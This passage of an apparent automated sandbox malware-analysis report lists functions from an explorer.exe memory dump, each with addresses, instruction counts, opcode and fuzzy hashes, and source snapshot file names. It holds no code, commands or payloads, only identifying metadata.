                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e61ea7cd5c88c6b66c80fe33feb4637e5e676dd514a2eb1017daad7d3a8e1209
                                                • Instruction ID: 8456bddda58af97844ef98dfa5cd32032322dd9f20aa019976284b7b3f755c7c
                                                • Opcode Fuzzy Hash: e61ea7cd5c88c6b66c80fe33feb4637e5e676dd514a2eb1017daad7d3a8e1209
                                                • Instruction Fuzzy Hash: 3FF0B771E0891D8FEF94EB98D8957ECB7B2FB58341F50416AC50DE3241DE3868519B41
                                                Function 00007FF887C6280B Relevance: .0, Instructions: 35COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2454b04b6970654b38a17d9b1e4f0a6e7e7e09fbd9ce5321a8287b022f11a5c8
                                                • Instruction ID: 99e73224ea23ba0b12b1e8ab4c00499a185c62bf5393d1cb53cc8ffefc8b1617
                                                • Opcode Fuzzy Hash: 2454b04b6970654b38a17d9b1e4f0a6e7e7e09fbd9ce5321a8287b022f11a5c8
                                                • Instruction Fuzzy Hash: 0CF03A76D5890D8EDF81EB98D8556FEBBF1FB58301F00043AE509E3180DB34A554CB81
                                                Function 00007FF887C62810 Relevance: .0, Instructions: 34COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0dbd3f888a1b19581b38ed27c028544f94e0fe5c6a9943e86b2da5b41740d4ab
                                                • Instruction ID: 93dccb62cbdea8c69e2728225b36e4a985f3deb489e49305ad9d286e0240bec8
                                                • Opcode Fuzzy Hash: 0dbd3f888a1b19581b38ed27c028544f94e0fe5c6a9943e86b2da5b41740d4ab
                                                • Instruction Fuzzy Hash: B8F0583181890D8EDF80EB98D8497FEBBF0FB49305F00052AE109E3180DB35A1548B81
                                                Function 00007FF887C6096B Relevance: .0, Instructions: 33COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c93f8b10213169d975d12f236c8cd42e3d51a3ad3ea86ff868a6eb24b3f43890
                                                • Instruction ID: d5ab1d0161380cb782a61ea773f925054e1caf2ea0fdcc411f222da77ee16708
                                                • Opcode Fuzzy Hash: c93f8b10213169d975d12f236c8cd42e3d51a3ad3ea86ff868a6eb24b3f43890
                                                • Instruction Fuzzy Hash: EBF09A71C98A0D9EEB54EB68C8986BDBBF2FF54344F4400B9D419E70D2EE346A84C741
                                                Function 00007FF887C68F31 Relevance: .0, Instructions: 27COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 645b19fe3e99bae36548be009377c9570c4c1f46bf5ed495e69e4f0fff59995f
                                                • Instruction ID: 0cf442c9256e38e597dcd44edbc961c602b5e4fbd9096ab4c91d8e03189fc83b
                                                • Opcode Fuzzy Hash: 645b19fe3e99bae36548be009377c9570c4c1f46bf5ed495e69e4f0fff59995f
                                                • Instruction Fuzzy Hash: DAE02621C4CB910FD7A46265A4951947AE1EF1521070901EFC58AC7183FD5CAC418306
                                                Function 00007FF887C67BFB Relevance: .0, Instructions: 21COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6af7ff6d7501a869f59b537104d89896a3fa1f0425b331a2ca2a26ed552bbc19
                                                • Instruction ID: 57f7577a1d49d2bf09f05cd4e3188b197c2412d08049d3dc82f07ed40d66bef9
                                                • Opcode Fuzzy Hash: 6af7ff6d7501a869f59b537104d89896a3fa1f0425b331a2ca2a26ed552bbc19
                                                • Instruction Fuzzy Hash: 11E0867188D54D4BDB15EF54DD412FD7A61FF45340F040939E42D83081EB79A564C781
                                                Function 00007FF887C6D1D1 Relevance: .0, Instructions: 10COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 97bfa5060d875485e233d4bed1db59b9af19020b824eb5e0b00f8b52afc98504
                                                • Instruction ID: 452336cfe936869eea86079998c6101cdd9a0e236f77e5d2e0ad2e7bbc5eeca2
                                                • Opcode Fuzzy Hash: 97bfa5060d875485e233d4bed1db59b9af19020b824eb5e0b00f8b52afc98504
                                                • Instruction Fuzzy Hash: ADB09211B5C8090A67E4A11CA14563E00D7ABD81A0724037FC00DC328DEC1878038286
                                                Function 00007FF887C6B9CD Relevance: .0, Instructions: 7COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6065ccd08c7418a69208a1c5074202534f9f6e7e785a7e38a9a230fa036e8997
                                                • Instruction ID: 3c439a2212727a4832c59dda22c18d2e97fef6496700cc0b30c5211f21f3c917
                                                • Opcode Fuzzy Hash: 6065ccd08c7418a69208a1c5074202534f9f6e7e785a7e38a9a230fa036e8997
                                                • Instruction Fuzzy Hash: 83B09200CCC40390E724296084C11BC2832BF08398EB00578C00F03081FE0E3084E202

                                                Non-executed Functions

                                                Function 00007FF887C60688 Relevance: 5.4, Strings: 4, Instructions: 366COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (0E$(0E$N_^$r6B
                                                • API String ID: 0-2372584359
                                                • Opcode ID: 92c68ebeac3cb993a4c2d82b14b6fd20a033c7868c9add6747ae303e9cc6c2a3
                                                • Instruction ID: 327559b29b73146feefa9c5c3ec88fde4710ba32b45ff5a19050b1cf797104b9
                                                • Opcode Fuzzy Hash: 92c68ebeac3cb993a4c2d82b14b6fd20a033c7868c9add6747ae303e9cc6c2a3
                                                • Instruction Fuzzy Hash: E2A1CA22F4CE4A4BEB98EA5CA4E56F937E2FF94395714017BC44DC7187EE18E8468341
                                                Function 00007FF887C6FFC0 Relevance: 5.1, Strings: 4, Instructions: 148COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: CY_H$b4B$b4B$b4B
                                                • API String ID: 0-1829337378
                                                • Opcode ID: 1aab314fb63a78175df9b7943281cc74e1797f40b92e83f27a60a3a5be666ecf
                                                • Instruction ID: 555707acd2888ed78a9c93810fa9aa29502485d7f2c84e6541a4b03605c3b8bb
                                                • Opcode Fuzzy Hash: 1aab314fb63a78175df9b7943281cc74e1797f40b92e83f27a60a3a5be666ecf
                                                • Instruction Fuzzy Hash: 1F513B71D58A5D9FDB98DBACC451AACBBF2FF59391F10017AC40DE7282DE286841CB41